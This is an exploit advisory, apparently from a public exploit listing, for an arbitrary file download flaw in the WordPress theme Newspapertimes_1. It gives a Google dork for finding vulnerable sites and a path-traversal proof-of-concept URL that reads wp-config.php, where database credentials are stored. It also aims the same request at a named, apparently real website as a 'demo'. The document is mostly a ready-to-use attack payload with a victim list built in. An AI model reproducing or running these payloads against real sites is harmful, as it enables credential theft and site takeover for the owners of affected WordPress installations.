facebook facebook twitter rss

Wordpress Newspapertimes_1 Theme Arbitrary File Download Vulnerability

Author: Felipe M , Published: 26-09-2014
# Exploit Title: Wordpress Newspapertimes_1 Theme Arbitrary File Download Vulnerability

# Google Dork: inurl:wp-content/themes/Newspapertimes_1/

# Date: 25-09-2014

# Author: Felipe M.

# Author E-mail : secure@gudwal.com

# Category: webapps

# platform: php

# Vendor: http://magazine3.com # p0c :

http://[site]/wp-content/themes/Newspapertimes_1/download.php?filename=../../../../wp-config.php

# demo :

http://www.livekarad.com/wp-content/themes/Newspapertimes_1/download.php?filename=../../../../wp-config.php

Like us on Facebook :